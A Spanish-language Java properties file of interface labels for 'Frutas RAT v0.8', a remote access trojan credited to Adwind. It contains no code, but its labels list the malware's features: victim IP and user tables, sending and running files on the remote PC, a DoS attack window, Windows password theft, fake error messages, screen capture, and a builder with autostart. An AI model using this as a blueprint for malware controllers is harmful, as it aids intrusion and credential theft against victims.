idioma.nombre=Espa\u00f1ol
idioma.autor=Adwind
nombre.rat=Frutas RAT v0.8 [Vesi\u00f3n Naranja]
#Botones de la 1 opcion de la barra
barra1.central=Central
barra1.lenguaje=Idiomas
barra1.nuevoserver=Nuevo Servidor

#Botones de la 2 opcion de la barra
barra2.acerca=Acerca
barra2.autor=Autor

#Frame general
framegeneral.nombre=Usuarios
label.puerto=Puerto 1:
label.puerto2=Puerto 2:
boton.escucha.activado=Escuchar
boton.escucha.desactivado=Parar
label.contrasena=Contrase\u00f1a:
label.conectado=Conectados: 
tabla.pais=Pa\u00eds
tabla.identificador=Identificador
tabla.externa=IP Externa
tabla.interna=IP Interna
tabla.user=Usuario PC
tabla.os=S.O.
tabla.jre=Versi\u00f3n JRE
tabla.version=Versi\u00f3n

#Ventana de abrir URL
abrir.url.titulo=URL Remota:
abrir.url.labelVeces=Numero de veces:
abrir.url.botonEnviar=Enviar

#Venta de Acerca
acerca.titulo=Acerca
acerca.autor=Autor: 
acerca.pagina=P\u00e1gina: 
acerca.version=Versi\u00f3n
acerca.tipo= Tipo: 

#Captura de pantalla
captura.titulo=Captura de pantalla
captura.boton=Parar
captura.segundo=Segundos
captura.tamano=Tama\u00f1o
captura.tipo=Tipo
captura.color=Color
captura.gris=Gris

#Ventana DOS
dos.pagina=P\u00e1gina:
dos.puerto=Puerto:
dos.hilos=Hilos:
dos.tiempo=Tiempo (s):
dos.boton=Enviar

#Ventana enviar archivo
envia.titulo=Envio de archivos a la PC remota
envia.busca=Buscar Archivo
envia.envia=Enviar y Ejecutar
envia.cancela=Cancelar

#Ventana Mensajes
mensaje.titulo=Mensajes Falsos:
mensaje.error=Error
mensaje.advertencia=Advertencia
mensaje.informacion=Informaci\u00f3n
mensaje.pregunta=Pregunta
mensaje.titulo.texto=Titulo
mensaje.cuerpo=Cuerpo
mensaje.enviar=Enviar
mensaje.prueba=Prueba

#Ventana Nuevo Servidor
servidor.titulo=Creaci\u00f3n de un Nuevo Servidor
servidor.conexion=Conexi\u00f3n
servidor.autoinicio=Autoinicio
servidor.contrasena=Contrase\u00f1a
servidor.puerto1=Puerto 1: 
servidor.puerto2=Puerto 2: 
servidor.crear=Crear Servidor
servidor.windows=Iniciar en Windows
servidor.registro=Entrada Registo: 
servidor.nobrereg=Nombre Final del *.JAR

#Ventana PopUp
popup.mensaje=Mensajes Falsos
popup.contrasena=Contrase\u00f1as (Windows)
popup.url=Abrir URL
popup.envia=Enviar Archivo
popup.para=Parar Conexion
popup.reinicia=Reiniciar Conexi\u00f3
popup.desintala=Desinstalar
popup.captura=Captura de Pantalla
popup.dos=Ataque D.o.S
popup.archivos=Administrador de Archivos